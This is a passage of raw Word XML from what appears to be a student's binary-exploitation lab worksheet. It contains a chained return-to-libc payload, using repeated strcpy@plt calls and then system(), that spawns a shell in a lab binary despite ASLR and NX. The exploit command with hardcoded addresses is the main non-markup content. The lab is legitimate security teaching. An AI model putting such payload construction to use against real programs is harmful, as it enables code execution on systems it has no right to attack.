          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pP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We can now construct and invoke our full payload using the following template, which is based on our original return-to-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload. </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ans_check5 $(python -c "print '{&amp;strcpy@plt}'*12+'{build-string-payload}'+'{&amp;system()}'+'{&amp;exit_path}'+'{str_loc_1}'")</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Use the space below to build your command. (Note that you will want to run your build-string payload together on one line in this case.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRPr="00AC696B" w:rsidRDefault="00AC696B">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./ans_check5 $(python -c "print '\xb0\x83\x04\x08'*12+'\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x41\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x54\x81\x04\x08\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x42\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x57\x81\x04\x08\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x43\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x56\x81\x04\x08\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x44\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x5e\x81\x04\x08\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x45\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x54\x81\x04\x08\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x46\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x57\x81\x04\x08\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x47\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\xb5\x82\x04\x08\xb0\x83\x04\x08\x2e\x86\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x48\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\xb3\x82\x04\x08\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x49\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x96\x83\x04\x08\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x4a\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\xcc\x82\x04\x08'+'\xd0\x83\x04\x08'+'\xf0\x83\x04\x08'+'</w:t>
      </w:r>
      <w:r w:rsidRPr="00740CF0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x41\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>'")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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Now, execute the command. If it did not work (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, you don’t find yourself in a new bash shell) check your payload for errors. Please try multiple times to solve whatever problems you may have before asking for assistance. You can also invoke within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to spot problems.</w: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pPr>
      <w:r>
        <w:t xml:space="preserve">Include your successful transcript below. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1FB9" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
      <w:r w:rsidRPr="00CF1FB9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4929229"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="9" name="Picture 9" descr="C:\Users\Po Adrich\Desktop\CSE523\18\QQ截图20190421160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o Adrich\Desktop\CSE523\18\QQ截图2019042116031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bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>GATE 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>And, with that, we have an exploit that works when both ASLR and NX are enabled.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A32DA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auto"/>
    <w:pitch w:val="default"/>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0874AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4210B876"/>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DAA"/>
    <w:rsid w:val="00A327C8"/>
    <w:rsid w:val="00A32DAA"/>
    <w:rsid w:val="00AC696B"/>
    <w:rsid w:val="00CF1F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9480A07-590C-4655-BE9A-B055635E5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zh-CN"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after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="280" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs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szCs w:val="72"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pP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14</Pages>
  <Words>1884</Words>
  <Characters>10739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Xie Adrien Zuoting</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-21T20:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-22T02:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>